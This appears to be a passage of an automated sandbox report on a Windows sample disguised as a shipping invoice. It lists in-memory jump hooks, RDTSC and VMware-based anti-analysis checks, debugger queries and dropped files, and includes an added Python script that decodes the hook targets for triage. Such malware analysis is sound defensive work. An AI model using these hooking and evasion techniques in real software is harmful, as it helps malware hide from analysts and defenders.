          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00
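          Every patch above is five bytes beginning with E9, the x86 near jump with a signed 32-bit displacement, so each "Memory written" record can be decoded into the address the hooked code now diverts to. The following is an added triage script, not part of the Joe Sandbox report or of the sample: it parses the thirteen PID 1748 records copied from the list above (the PID 6360 records carry the identical patch set), computes each jump target as base + 5 + rel32 masked to 32 bits (all processes here are SysWOW64), and groups targets that land within a small window of each other. The window size (0x100) and the cluster heuristic are assumptions for illustration; the report does not state which module owns the 0x770D0000-0x77180000 range, so naming the hooked exports would require the ntdll load base from the same run.

```python
import re
import struct
from collections import defaultdict

# The 13 "Memory written" records for PID 1748, copied from the signature
# above (report data, not constructed). PID 6360 receives the same patches.
REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77165050 value: E9 EB 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 771650F0 value: E9 5B 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77165180 value: E9 9B 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77165190 value: E9 CB 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 771651A0 value: E9 4B 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 7717FEE0 value: E9 9B FF FF FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 771133C0 value: E9 FB 6F 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77114760 value: E9 2B 6B 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 770D6590 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 770DB510 value: E9 2B 53 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 770FC490 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 7711EE00 value: E9 E1 52 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 7711EFD0 value: E9 26 5B 00 00
""".strip().splitlines()

# Tolerates the report's own spacing and the run-together "exeMemory written" form.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*Memory written:\s*PID:\s*(?P<pid>\d+)\s+"
    r"base:\s*(?P<base>[0-9A-Fa-f]+)\s+value:\s*(?P<patch>(?:[0-9A-Fa-f]{2}\s*)+)"
)


def decode_jmp_rel32(base, patch):
    """Absolute target of a 5-byte 'E9 rel32' near jump written at `base`,
    or None when the patch is not such a jump. rel32 is signed and relative
    to the end of the instruction (base + 5); the sum is masked to 32 bits
    because the hooked processes run under SysWOW64."""
    if len(patch) < 5 or patch[0] != 0xE9:
        return None
    rel = struct.unpack("<i", patch[1:5])[0]
    return (base + 5 + rel) & 0xFFFFFFFF


def parse_hooks(lines):
    """Turn 'Memory written' report lines into records with decoded targets;
    lines that are not such records are skipped."""
    hooks = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        base = int(m["base"], 16)
        patch = bytes.fromhex(m["patch"].replace(" ", ""))
        hooks.append({"writer": m["src"], "pid": int(m["pid"]), "base": base,
                      "patch": patch, "target": decode_jmp_rel32(base, patch)})
    return hooks


def targets_by_pid(hooks):
    """{pid: sorted distinct jump targets} for the hooks decoded as jumps."""
    out = defaultdict(set)
    for h in hooks:
        if h["target"] is not None:
            out[h["pid"]].add(h["target"])
    return {pid: sorted(t) for pid, t in out.items()}


def clustered_targets(hooks, window=0x100):
    """Groups of distinct targets lying within `window` bytes of each other.
    Several patched entry points funnelling into one small region point to a
    shared trampoline/dispatcher rather than independent per-function hooks
    (window value is an assumption chosen for this report's addresses)."""
    ts = sorted({h["target"] for h in hooks if h["target"] is not None})
    clusters, cur = [], [ts[0]] if ts else []
    for t in ts[1:]:
        if t - cur[-1] <= window:
            cur.append(t)
        else:
            clusters.append(cur)
            cur = [t]
    if cur:
        clusters.append(cur)
    return [c for c in clusters if len(c) > 1]


if __name__ == "__main__":
    hooks = parse_hooks(REPORT_LINES)
    for h in hooks:
        print(f"pid {h['pid']} {h['base']:08X} -> {h['target']:08X}  "
              f"({h['patch'].hex(' ').upper()})")
    for cluster in clustered_targets(hooks):
        print("shared region:", ", ".join(f"{t:08X}" for t in cluster))
```

          Run as-is, the arithmetic shows that six of the thirteen patches (the five at 77165050-771651A0 and the one at 77114760) redirect into the 0x7711B1F0-0x7711B290 range, while the two `E9 0B 00 00 00` patches merely skip the next eleven bytes of the function they sit in. Whether a target lies inside or outside the hooked module cannot be decided from these records alone; that check needs the module load ranges from the same run.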
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002F685C4 second address: 0000000002F685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002F6894E second address: 0000000002F68954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408880 rdtsc
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
          Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -190000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6744 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2928 Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00406469 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00402765 FindFirstFileA,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.923834797.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.701787722.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.710616810.000000000A9CC000.00000004.00000001.sdmp Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: explorer.exe, 00000004.00000000.710247999.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\rundll32.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408880 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00409AF0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03718794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03738E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03748EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03727D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03743D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0378A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]
